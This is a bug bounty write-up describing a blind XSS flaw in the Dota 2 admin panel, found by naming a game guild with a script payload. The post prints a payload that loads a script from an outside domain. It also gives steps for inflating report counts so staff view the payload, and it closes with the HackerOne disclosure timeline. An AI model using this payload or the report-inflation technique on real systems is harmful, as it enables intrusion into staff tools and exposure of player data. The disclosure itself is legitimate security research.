The finding started when DOTA 2 is announcing the new feature for the battle pass owner that is being able to create a guild in the game the update was around October 2020.
Guild Updates
We reintroduced Guilds during the Battle Pass, and we were happy to see how many players participated in Guilds and shared their feedback with us. We are keeping the existing Guilds, but many of the rewards received only worked in the context of the Battle Pass. We’ve redesigned those features so that you can enjoy playing with your guild all the time.
- source: https://www.dota2.com/newsentry/3066366095799664170
Because I was an active player of the game and also BugBounty hunter, my idea just popped out to create a guild with the Blind XSS Payload name, without even thinking the payload will be executed somewhere on the valve systems.
my first thought is wrong and the exploit was executed on the Dota 2 administration panel, which is a web application hosted on dota2.com which makes me excited 🙀🙀🙀.
This is was the admin panel looks like, rather than trying to escalate my privilege with the javascript execution I have, I just report what I found immediately to the https://hackerone.com/valve team, but I’ve seen the admin panel manages all the information of the game like the IP address of the currently in-game rooms, also I can possibly ban a player there, pro player information also stored there, etc is like almost everything custom game and whatever there.
After my investigation of the vulnerability my conclusion is, the more guild registered to the system is more hard of our exploit to be viewed by the staff that logged in to the administrator panel because the table list of a guild was sorted by the number of reports received to the guild, so to reproduce it for the second time I was using this steps below:
- Create guild with a blind xss payload as the name
'"><script src=//domain></script>
- Report the guild name multiple times, until you feel the report amount is enough to make our guild listed on the first page.
- Profit!
alert(1)
There is 3 form of report that can a guild get, report guild name, report guild logo, report guild tag, and all of the report amount is combined to total_reports that will be used as the sorted value when the datatable is loaded on the application.
I was automating this process to login to the game and report my guild repeatedly to get the number of total_reports I want to get my guild on the first page of the datatable since the table is configured to only show 50 rows for each page, to get this was not hard since I was testing when the feature is just released couple days ago.
Key Takeaways
- Keep in mind of your input might end up anywhere that you do not even expect, we never know ¯\(ツ)/¯.
That is all for this writeup folks, see you on the next writeup.
Jun 12, 2020: Reported
Jun 12, 2020: Severity Changed Crit -> High ( I don’t get it actually)
Jun 16, 2020: Triaged
Sept 8, 2020: Severity Changed High -> Med ( Based on all the information and actions that I can do there, this is just disappointing 😪 )
Sept 8 2020: Rewarded 750USD + 150USD Bonus
Proof(UNDISCLOSED yet): https://hackerone.com/reports/896281
My H1 Profile: https://hackerone.com/abdilahrf_